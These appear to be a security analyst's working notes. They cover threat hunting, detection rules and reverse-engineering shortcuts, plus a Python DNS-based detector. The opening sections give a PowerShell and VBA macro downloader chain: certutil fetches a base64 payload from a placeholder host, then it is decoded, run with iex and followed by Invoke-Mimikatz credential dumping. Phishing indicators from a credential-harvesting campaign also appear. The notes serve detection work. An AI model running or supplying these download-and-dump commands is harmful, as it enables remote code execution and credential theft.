downloader certutil powershell invoke-mimikatz

sample downloader that executed mimikatz

certutil.exe -urlcache -split -f http://somewhere/test.txt 'test.txt';
$B64 = get-content test.txt ;
$clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64));
$clear |out-file -filepath 'test.txt';
powershell -version 2 -command "iex (get-content 'test.txt'|out-string);
Invoke-Mimikatz -DumpCreds

VBA Macro downloader invoke-mimikatz

Shell ("certutil.exe -urlcache -split -f http://somewhere/test4.txt ""tes5.txt""")
Shell ("powershell.exe -noprofile -command ""start-sleep -s 5; $B64 = get-content 'test.txt' ; $clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64)); $clear |out-file -filepath 'test.txt';""")
Shell ("cmd.exe /c ""c:\windows\sysnative\windowspowershell\v1.0\powershell.exe -version 2 -noprofile -noexit -command ""start-sleep -s 15; iex (get-content 'test.txt'|out-string); invoke-mimikatz -command 'token::whoami';""""")

Batch Script - run strings on all files in a directory, searching for a keyword

 REM Run strings64 (minimum length 8) over every file in the current directory and keep lines containing "github"
 for %%f in (*) do (
    c:\users\221602\desktop\neo_apps\strings64.exe -n 8 "%%f" | findstr github
 )


IDA Pro Keyboard Shortcuts

 - ASCII strings: highlight the string, press 'a'
 - Unicode strings: highlight the ASCII string, press 'Alt-a', choose Unicode
 - Rename variable: highlight the variable, press 'n'
 - Cross references: highlight the variable, press 'x'
 - Step into: F7
 - Step over: F8
 - Run until return: Ctrl-F7
 - Continue: F9
 - Jump to address: press 'g', enter the address
 - Comment a line: press ';', enter the comment

Threat Hunt - Proxy Phishing from HTML attachment

proxy #threathunt idea:

 where urlpath = '/next.php' and method = 'POST' and referrer is null

Notes: cred #phishing, 9/10/21, SharePoint theme, subject "notification 1 new FAX", from mout.kundenserver[.]de. The HTML attachment posts the stolen creds to gms4372.nelrg[.]com/gfkn/next.php.

Threat Hunt - Proxy C2 IP with PHP

potential proxy #threathunt idea:

POST or PUT to URLs that contain an IP address and a .php path (all three conditions together):

 domain matches '^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$'
 method in ('POST', 'PUT')
 urlpath endswith '.php'

Siem Rule - IP Lookup Service

Malware IP lookup service #siem detection rule idea

dns request in:

imagename not in
 - brave.exe
 - iexplore.exe
 - opera.exe
 - firefox.exe
 - msedge.exe
 - chrome.exe
 - vivaldi.exe
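The rule idea above as a small filter over constructed Sysmon-style DNS query events (Image and QueryName fields). This is an added example, not code from the original notes: the browser exclusion list is the one from the notes, but the lookup-service domain list was not preserved on the page, so IP_LOOKUP_DOMAINS holds placeholder .example names that must be replaced with the real list; the event shape and the sample events are also assumptions.

```python
import ntpath
from typing import Dict, List

# Browser image names excluded by the rule above (from the notes)
BROWSER_IMAGES = {
    "brave.exe", "iexplore.exe", "opera.exe", "firefox.exe",
    "msedge.exe", "chrome.exe", "vivaldi.exe",
}

# PLACEHOLDER: the notes' "dns request in:" list did not survive; replace with the real lookup-service domains
IP_LOOKUP_DOMAINS = {"iplookup-service.example", "whatismyip.example"}

# Constructed Sysmon-like DNS events (EventID 22 carries Image and QueryName); not real telemetry
SAMPLE_DNS_EVENTS: List[Dict[str, str]] = [
    {"host": "WS01", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "query": "whatismyip.example"},
    {"host": "WS01", "image": r"C:\Users\alice\AppData\Local\Temp\update.exe", "query": "whatismyip.example"},
    {"host": "WS02", "image": r"C:\Windows\System32\svchost.exe", "query": "time.example"},
    {"host": "WS03", "image": r"C:\Windows\Temp\a.exe", "query": "api.IPLOOKUP-SERVICE.example."},
]


def image_name(image_path: str) -> str:
    """Reduce a full Windows image path to a lower-cased file name; ntpath works on any host OS."""
    return ntpath.basename(image_path).lower()


def is_lookup_domain(query: str) -> bool:
    """Match the domain itself or any subdomain, ignoring case and a trailing dot."""
    q = query.rstrip(".").lower()
    return any(q == d or q.endswith("." + d) for d in IP_LOOKUP_DOMAINS)


def detect_ip_lookup(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Rule: DNS request for a lookup-service domain from a process that is not a listed browser."""
    return [e for e in events
            if is_lookup_domain(e["query"]) and image_name(e["image"]) not in BROWSER_IMAGES]


if __name__ == "__main__":
    for hit in detect_ip_lookup(SAMPLE_DNS_EVENTS):
        print(hit["host"], image_name(hit["image"]), hit["query"])
```

The exclusion works on the base file name only, so a non-browser binary that happens to be named chrome.exe is still excluded; pairing the image name with a signer or path check is a cheap way to tighten that if the SIEM carries those fields.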